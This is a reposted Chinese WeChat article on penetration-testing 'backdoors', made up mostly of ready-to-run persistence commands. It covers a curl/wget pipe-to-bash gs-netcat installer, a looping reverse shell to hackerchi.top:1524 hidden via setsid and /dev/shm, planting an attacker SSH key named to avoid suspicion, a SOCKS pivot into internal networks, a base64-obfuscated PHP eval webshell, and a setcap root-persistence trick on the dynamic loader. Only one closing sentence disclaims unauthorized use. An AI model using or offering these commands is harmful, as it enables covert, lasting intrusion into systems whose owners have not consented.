❝
欢迎访问我们的网站和关注我们的公众号,获取最新的免费资源、安全知识、信息流。
网站:https://hackerchi.top
信息流:https://hackerchi.top/Feeds.html
公众号:黑客驰
❞
❝
在渗透测试中,建立持久的后门是至关重要的,以便在需要时重新访问系统。以下是一些常用的后门技术
❞
6.1. gs-netcat 自动部署脚本
gs-netcat 工具提供了一个方便的自动部署脚本,可以快速建立反向 shell 连接。
使用方法:
bash -c "$(curl -fsSLk <https://gsocket.io/y>)"
或者
bash -c "$(wget --no-check-certificate -qO- <https://gsocket.io/y>)"
部署您自己的 gsocket 服务器:
LOG=results.log bash -c "$(curl -fsSL <https://gsocket.io/ys>)" # 注意 '/ys' 而不是 '/y'
6.2. 后台反向 shell
这种后门会在后台持续尝试连接回攻击者的服务器,即使连接断开也会自动重连。
示例:
setsid bash -c 'while :; do bash -i &>/dev/tcp/hackerchi.top/1524 0>&1; sleep 360; done' &>/dev/null
防止多个实例启动:
fuser /dev/shm/.busy &>/dev/null || nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3</dev/shm/.busy; bash -i &>/dev/tcp/hackerchi.top/1524 0>&1 ; sleep 360; done' &>/dev/null &
6.3. 授权密钥
将攻击者的 SSH 公钥添加到目标系统的 /root/.ssh/authorized_keys 文件中,可以实现持久的后门访问。
提示: 将公钥文件末尾的名称更改为一些不起眼的名称,例如 backup@ubuntu 或管理员的真实姓名,以避免引起怀疑。
示例:
$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0
[...]
u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C
c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu
6.4. 远程访问整个网络
使用 gs-netcat 工具可以在目标主机的专用 LAN 上创建一个 SOCKS 出口节点,从而允许攻击者从外部访问内部网络。
示例:
gs-netcat -l -S # 在目标主机上运行
gs-netcat -p 1080 # 在攻击者工作站上运行
# 从攻击者工作站访问目标主机 LAN 上的 route.local:22
socat - "SOCKS4a:127.1:route.local:22"
其他方法:
-
Gost/Cloudflared: 使用 Cloudflare Tunnel 建立 TCP 隧道。
-
反向 Wireguard: 使用 Wireguard 建立反向连接,从 segfault.net[1] 访问内部网络。
6.5. 最小的 PHP 后门
将以下代码添加到任何 PHP 文件的开头,即可创建一个简单的后门:
<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>
测试:
### 启动测试 PHP 服务器
cd /var/www/html && php -S 127.0.0.1:8080
### 不执行命令
curl <http://127.0.0.1:8080/test.php>
### 执行命令
curl <http://127.0.0.1:8080/test.php> -d 0="ps fax; uname -mrs; id"
6.6. 本地根后门
一旦获得 root 权限,可以使用以下方法保持 root 状态:
执行以下命令:
setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
成为 root 用户:
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
请注意,后门技术应仅用于合法的渗透测试和安全评估目的。未经授权使用后门是非法的,并可能导致严重后果。
往期精彩内容
参考资料
segfault.net: http://segfault.net/
原文始发于微信公众号(黑客驰):高级黑客技术- 6. 后门
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论